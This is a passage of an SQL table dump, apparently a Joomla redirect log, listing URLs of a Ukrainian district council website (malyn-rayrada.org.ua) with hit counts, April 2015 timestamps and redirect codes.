17:16:13','0000-00-00 00:00:00',301),(12999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38&Itemid=73&lang=uk','','','',6,0,'2015-04-15 17:16:37','0000-00-00 00:00:00',301),(13000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',47,0,'2015-04-15 17:16:47','0000-00-00 00:00:00',301),(13001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38&Itemid=73&lang=uk','','','',6,0,'2015-04-15 17:16:56','0000-00-00 00:00:00',301),(13002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-15 17:16:59','0000-00-00 00:00:00',301),(13003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',5,0,'2015-04-15 17:17:02','0000-00-00 00:00:00',301),(13004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2015-04-15 17:19:59','0000-00-00 00:00:00',301),(13005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43:--25072012-&Itemid=82&lang=ru','','','',10,0,'2015-04-15 17:20:02','0000-00-00 00:00:00',301),(13006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43:--25072012-&Itemid=82&lang=uk','','','',9,0,'2015-04-15 17:22:17','0000-00-00 00:00:00',301),(13007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=en','','','',1,0,'2015-04-15 17:22:40','0000-00-00 00:00:00',301),(13008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=ru','','','',1,0,'2015-04-15 17:22:43','0000-00-00 00:00:00',301),(13009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2015-04-15 17:22:47','0000-00-00 00:00:00',301),(13010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-04-15 17:22:50','0000-00-00 00:00:00',301),(13011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=ru','','','',1,0,'2015-04-15 17:22:58','0000-00-00 00:00:00',301),(13012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-04-15 17:23:01','0000-00-00 00:00:00',301),(13013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-04-15 17:23:10','0000-00-00 00:00:00',301),(13014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2015-04-15 17:23:31','0000-00-00 00:00:00',301),(13015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2015-04-15 17:23:36','0000-00-00 00:00:00',301),(13016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-04-15 17:23:40','0000-00-00 00:00:00',301),(13017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-04-15 17:23:55','0000-00-00 00:00:00',301),(13018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45&Itemid=84&lang=en','','','',12,0,'2015-04-15 17:24:32','0000-00-00 00:00:00',301),(13019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:------------2014-&catid=36&Itemid=70&lang=uk','','','',4,0,'2015-04-15 17:56:55','0000-00-00 00:00:00',301),(13020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31:-25032011&Itemid=62&lang=uk','','','',6,0,'2015-04-15 18:47:18','0000-00-00 00:00:00',301),(13021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33&Itemid=66&lang=ru','','','',4,0,'2015-04-15 18:47:58','0000-00-00 00:00:00',301),(13022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33:-20052011&Itemid=66&lang=en','','','',4,0,'2015-04-15 18:48:02','0000-00-00 00:00:00',301),(13023,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33&Itemid=66&lang=ru','','','',1,0,'2015-04-15 18:48:05','0000-00-00 00:00:00',301),(13024,'http://www.malyn-rayrada.org.ua/index.php/256-upravlinnja-pfu-v-malinskomu-rajoni-informue','','','',12,0,'2015-04-16 00:04:52','0000-00-00 00:00:00',301),(13025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33&Itemid=66&lang=en','','','',11,0,'2015-04-16 00:55:24','0000-00-00 00:00:00',301),(13026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37&Itemid=72&lang=uk','','','',10,0,'2015-04-16 00:56:26','0000-00-00 00:00:00',301),(13027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37&Itemid=72&lang=uk','','','',2,0,'2015-04-16 00:56:41','0000-00-00 00:00:00',301),(13028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37:--21102011-&Itemid=72&lang=uk','','','',1,0,'2015-04-16 00:56:45','0000-00-00 00:00:00',301),(13029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38:--19122011-&Itemid=73&lang=en','','','',4,0,'2015-04-16 00:57:47','0000-00-00 00:00:00',301),(13030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38:--19122011-&Itemid=73&lang=ru','','','',8,0,'2015-04-16 00:57:49','0000-00-00 00:00:00',301),(13031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38:--19122011-&Itemid=73&lang=uk','','','',14,0,'2015-04-16 00:57:51','0000-00-00 00:00:00',301),(13032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33&Itemid=66&lang=en','','','',3,0,'2015-04-16 09:10:32','0000-00-00 00:00:00',301),(13033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33&Itemid=66&lang=ru','','','',8,0,'2015-04-16 09:11:02','0000-00-00 00:00:00',301),(13034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33&Itemid=66&lang=uk','','','',9,0,'2015-04-16 09:11:07','0000-00-00 00:00:00',301),(13035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33:-20052011&Itemid=66&lang=en','','','',5,0,'2015-04-16 09:11:27','0000-00-00 00:00:00',301),(13036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-04-16 09:11:29','0000-00-00 00:00:00',301),(13037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33:-20052011&Itemid=66&lang=uk','','','',2,0,'2015-04-16 09:11:33','0000-00-00 00:00:00',301),(13038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37&Itemid=72&lang=en','','','',1,0,'2015-04-16 09:12:08','0000-00-00 00:00:00',301),(13039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37&Itemid=72&lang=ru','','','',1,0,'2015-04-16 09:12:16','0000-00-00 00:00:00',301),(13040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37&Itemid=72&lang=en','','','',4,0,'2015-04-16 09:12:35','0000-00-00 00:00:00',301),(13041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37&Itemid=72&lang=ru','','','',1,0,'2015-04-16 09:12:38','0000-00-00 00:00:00',301),(13042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46&Itemid=85&lang=en','','','',1,0,'2015-04-16 09:15:35','0000-00-00 00:00:00',301),(13043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46&Itemid=85&lang=ru','','','',5,0,'2015-04-16 09:15:41','0000-00-00 00:00:00',301),(13044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37&Itemid=72&lang=en','','','',1,0,'2015-04-16 09:17:17','0000-00-00 00:00:00',301),(13045,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37&Itemid=72&lang=ru','','','',21,0,'2015-04-16 09:17:28','0000-00-00 00:00:00',301),(13046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38&Itemid=73&lang=ru','','','',4,0,'2015-04-16 09:20:23','0000-00-00 00:00:00',301),(13047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38&Itemid=73&lang=uk','','','',8,0,'2015-04-16 09:20:41','0000-00-00 00:00:00',301),(13048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-16 09:20:43','0000-00-00 00:00:00',301),(13049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-04-16 09:20:53','0000-00-00 00:00:00',301),(13050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38:--19122011-&Itemid=73&lang=uk','','','',6,0,'2015-04-16 09:20:55','0000-00-00 00:00:00',301),(13051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-04-16 09:24:45','0000-00-00 00:00:00',301),(13052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-04-16 09:24:52','0000-00-00 00:00:00',301),(13053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',10,0,'2015-04-16 09:25:03','0000-00-00 00:00:00',301),(13054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2015-04-16 09:25:10','0000-00-00 00:00:00',301),(13055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39&Itemid=76&lang=en','','','',7,0,'2015-04-16 09:36:26','0000-00-00 00:00:00',301),(13056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39&Itemid=76&lang=ru','','','',3,0,'2015-04-16 09:36:28','0000-00-00 00:00:00',301),(13057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39&Itemid=76&lang=uk','','','',7,0,'2015-04-16 09:36:31','0000-00-00 00:00:00',301),(13058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2015-04-16 09:36:34','0000-00-00 00:00:00',301),(13059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39:-22022012-&Itemid=76&lang=ru','','','',5,0,'2015-04-16 09:36:39','0000-00-00 00:00:00',301),(13060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:-l-r-2011-2016-&catid=39:-22022012-&Itemid=76&lang=uk','','','',2,0,'2015-04-16 09:36:43','0000-00-00 00:00:00',301),(13061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39&Itemid=76&lang=en','','','',1,0,'2015-04-16 09:36:49','0000-00-00 00:00:00',301),(13062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39&Itemid=76&lang=ru','','','',4,0,'2015-04-16 09:36:54','0000-00-00 00:00:00',301),(13063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39&Itemid=76&lang=uk','','','',3,0,'2015-04-16 09:37:11','0000-00-00 00:00:00',301),(13064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2015-04-16 09:37:21','0000-00-00 00:00:00',301),(13065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39:-22022012-&Itemid=76&lang=ru','','','',1,0,'2015-04-16 09:37:24','0000-00-00 00:00:00',301),(13066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&catid=39&Itemid=76&lang=uk','','','',8,0,'2015-04-16 09:38:30','0000-00-00 00:00:00',301),(13067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&catid=39:-22022012-&Itemid=76&lang=ru','','','',1,0,'2015-04-16 09:38:59','0000-00-00 00:00:00',301),(13068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=en','','','',1,0,'2015-04-16 09:57:28','0000-00-00 00:00:00',301),(13069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=ru','','','',1,0,'2015-04-16 09:57:32','0000-00-00 00:00:00',301),(13070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45&Itemid=84&lang=en','','','',1,0,'2015-04-16 09:57:34','0000-00-00 00:00:00',301),(13071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45&Itemid=84&lang=ru','','','',4,0,'2015-04-16 09:57:37','0000-00-00 00:00:00',301),(13072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45:--14112012-&Itemid=84&lang=en','','','',1,0,'2015-04-16 09:57:45','0000-00-00 00:00:00',301),(13073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2015-04-16 09:57:51','0000-00-00 00:00:00',301),(13074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=uk','','','',16,0,'2015-04-16 10:35:23','0000-00-00 00:00:00',301),(13075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37&Itemid=72&lang=uk','','','',5,0,'2015-04-16 19:06:06','0000-00-00 00:00:00',301),(13076,'http://malyn-rayrada.org.ua/index.php/876-sluzhba-bezpeki-informue','','','',10,0,'2015-04-16 19:13:12','0000-00-00 00:00:00',301),(13077,'http://www.malyn-rayrada.org.ua/attachments/312_reiting.pdf','','','',118,0,'2015-04-16 21:37:42','0000-00-00 00:00:00',301),(13078,'http://www.malyn-rayrada.org.ua/index.php/200-rozklad-teletransljacij-futbolnih-matchiv-evro','','','',40,0,'2015-04-16 21:55:24','0000-00-00 00:00:00',301),(13079,'http://www.malyn-rayrada.org.ua/index.php/327-zaversheno-pidgotovku-do-chergovoi-sesii-rajonnoi','','','',17,0,'2015-04-16 21:57:47','0000-00-00 00:00:00',301),(13080,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/764-informacija-ukrainkivskoi-silskoi-radi','','','',132,0,'2015-04-16 23:59:45','0000-00-00 00:00:00',301),(13081,'http://www.malyn-rayrada.org.ua/index.php/709-informacijne-upravlinnja-aparatu-verhovnoi-radi','','','',27,0,'2015-04-17 00:05:14','0000-00-00 00:00:00',301),(13082,'http://malyn-rayrada.org.ua/index.php/527-taka-pogoda-prognozuetsja-do-kincja-tizhnja','','','',8,0,'2015-04-17 00:16:33','0000-00-00 00:00:00',301),(13083,'http://www.malyn-rayrada.org.ua/index.php/528-ocinka-rezultativ-dijalnosti-rajderzhadministracij','','','',94,0,'2015-04-17 00:26:40','0000-00-00 00:00:00',301),(13084,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29&Itemid=60&lang=en','','','',1,0,'2015-04-17 01:20:43','0000-00-00 00:00:00',301),(13085,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29&Itemid=60&lang=ru','','','',1,0,'2015-04-17 01:20:45','0000-00-00 00:00:00',301),(13086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-04-17 01:21:21','0000-00-00 00:00:00',301),(13087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33&Itemid=66&lang=uk','','','',12,0,'2015-04-17 02:01:54','0000-00-00 00:00:00',301),(13088,'http://malyn-rayrada.org.ua/components/com_sexycontactform/fileupload/index.php','','','',8,0,'2015-04-17 04:22:18','0000-00-00 00:00:00',301),(13089,'http://www.malyn-rayrada.org.ua/index.php/550-ukraina-vidznachae-den-konstitucii','','','',12,0,'2015-04-17 05:14:57','0000-00-00 00:00:00',301),(13090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&Itemid=62&lang=uk','','','',1,0,'2015-04-17 05:17:59','0000-00-00 00:00:00',301),(13091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20&Itemid=42&lang=uk','','','',1,0,'2015-04-17 05:19:03','0000-00-00 00:00:00',301),(13092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&Itemid=73&lang=en','','','',1,0,'2015-04-17 05:19:42','0000-00-00 00:00:00',301),(13093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38&Itemid=73&lang=ru','','','',11,0,'2015-04-17 05:20:03','0000-00-00 00:00:00',301),(13094,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43&Itemid=82&lang=uk','','','',8,0,'2015-04-17 05:20:34','0000-00-00 00:00:00',301),(13095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=709:2012-06-14-15-04-11&catid=43&Itemid=82&lang=uk','','','',11,0,'2015-04-17 05:20:34','0000-00-00 00:00:00',301),(13096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43&Itemid=82&lang=uk','','','',17,0,'2015-04-17 05:20:36','0000-00-00 00:00:00',301),(13097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43:--25072012-&Itemid=82&lang=uk','','','',2,0,'2015-04-17 05:20:47','0000-00-00 00:00:00',301),(13098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44:--12092012-&Itemid=83&lang=uk','','','',9,0,'2015-04-17 05:20:50','0000-00-00 00:00:00',301),(13099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=842:2012-12-10-13-55-57&catid=46&Itemid=85&lang=uk','','','',2,0,'2015-04-17 05:21:11','0000-00-00 00:00:00',301),(13100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&Itemid=73&lang=ru','','','',1,0,'2015-04-17 05:21:34','0000-00-00 00:00:00',301),(13101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&Itemid=73&lang=uk','','','',1,0,'2015-04-17 05:21:41','0000-00-00 00:00:00',301),(13102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&Itemid=66&lang=ru','','','',1,0,'2015-04-17 05:23:20','0000-00-00 00:00:00',301),(13103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37&Itemid=72&lang=ru','','','',2,0,'2015-04-17 05:23:21','0000-00-00 00:00:00',301),(13104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&Itemid=73&lang=en','','','',1,0,'2015-04-17 05:23:23','0000-00-00 00:00:00',301),(13105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&Itemid=73&lang=ru','','','',1,0,'2015-04-17 05:23:55','0000-00-00 00:00:00',301),(13106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&Itemid=73&lang=uk','','','',1,0,'2015-04-17 05:23:55','0000-00-00 00:00:00',301),(13107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44&Itemid=83&lang=uk','','','',6,0,'2015-04-17 05:25:46','0000-00-00 00:00:00',301),(13108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20:2010-06-07-09-15-05&Itemid=42&lang=uk','','','',2,0,'2015-04-17 05:28:02','0000-00-00 00:00:00',301),(13109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16&Itemid=39&lang=uk','','','',12,0,'2015-04-17 05:28:19','0000-00-00 00:00:00',301),(13110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&Itemid=66&lang=en','','','',2,0,'2015-04-17 05:28:21','0000-00-00 00:00:00',301),(13111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-04-17 05:28:59','0000-00-00 00:00:00',301),(13112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&Itemid=73&lang=en','','','',1,0,'2015-04-17 05:29:58','0000-00-00 00:00:00',301),(13113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44:--12092012-&Itemid=83&lang=uk','','','',8,0,'2015-04-17 05:31:42','0000-00-00 00:00:00',301),(13114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45&Itemid=84&lang=ru','','','',6,0,'2015-04-17 05:32:06','0000-00-00 00:00:00',301),(13115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-04-17 05:32:08','0000-00-00 00:00:00',301),(13116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',4,0,'2015-04-17 05:32:42','0000-00-00 00:00:00',301),(13117,'http://www.malyn-rayrada.org.ua/index.php/855-pro-dostrokove-pripinennja-povnovazhen-verhovnoi','','','',22,0,'2015-04-17 05:57:52','0000-00-00 00:00:00',301),(13118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37:--21102011-&Itemid=72&lang=en','','','',1,0,'2015-04-17 06:39:06','0000-00-00 00:00:00',301),(13119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37:--21102011-&Itemid=72&lang=ru','','','',1,0,'2015-04-17 06:39:15','0000-00-00 00:00:00',301),(13120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-17 06:40:08','0000-00-00 00:00:00',301),(13121,'http://www.malyn-rayrada.org.ua/attachments/389_reiting.pdf','','','',110,0,'2015-04-17 06:55:53','0000-00-00 00:00:00',301),(13122,'http://www.malyn-rayrada.org.ua/index.php/500-upravlinnja-statistiki-v-m-malin-informue','','','',147,0,'2015-04-17 11:15:06','0000-00-00 00:00:00',301),(13123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&Itemid=14&lang=en','','','',2,0,'2015-04-17 11:41:35','0000-00-00 00:00:00',301),(13124,'http://www.malyn-rayrada.org.ua/index.php/467-mikola-dushko-problem-z-reestracieju-zemli-bude','','','',12,0,'2015-04-17 13:04:24','0000-00-00 00:00:00',301),(13125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33:-20052011&Itemid=66&lang=en','','','',1,0,'2015-04-17 13:19:05','0000-00-00 00:00:00',301),(13126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-04-17 13:19:07','0000-00-00 00:00:00',301),(13127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=409:-2011-&catid=37:--21102011-&Itemid=72&lang=uk','','','',1,0,'2015-04-17 13:19:58','0000-00-00 00:00:00',301),(13128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-17 13:20:08','0000-00-00 00:00:00',301),(13129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38&Itemid=73&lang=ru','','','',9,0,'2015-04-17 13:20:10','0000-00-00 00:00:00',301),(13130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38&Itemid=73&lang=en','','','',4,0,'2015-04-17 13:20:48','0000-00-00 00:00:00',301),(13131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-17 13:20:50','0000-00-00 00:00:00',301),(13132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-17 13:20:53','0000-00-00 00:00:00',301),(13133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38:--19122011-&Itemid=73&lang=ru','','','',12,0,'2015-04-17 13:20:56','0000-00-00 00:00:00',301),(13134,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38:--19122011-&Itemid=73&lang=uk','','','',1,0,'2015-04-17 13:20:58','0000-00-00 00:00:00',301),(13135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38&Itemid=73&lang=en','','','',7,0,'2015-04-17 13:21:27','0000-00-00 00:00:00',301),(13136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=482:-2012-2015-&catid=38&Itemid=73&lang=ru','','','',4,0,'2015-04-17 13:21:29','0000-00-00 00:00:00',301),(13137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=39:-22022012-&Itemid=76&lang=uk','','','',2,0,'2015-04-17 13:23:13','0000-00-00 00:00:00',301),(13138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2015-04-17 13:23:16','0000-00-00 00:00:00',301),(13139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45&Itemid=84&lang=en','','','',3,0,'2015-04-17 13:24:40','0000-00-00 00:00:00',301),(13140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45&Itemid=84&lang=ru','','','',1,0,'2015-04-17 13:24:43','0000-00-00 00:00:00',301),(13141,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45:--14112012-&Itemid=84&lang=en','','','',3,0,'2015-04-17 13:24:47','0000-00-00 00:00:00',301),(13142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2015-04-17 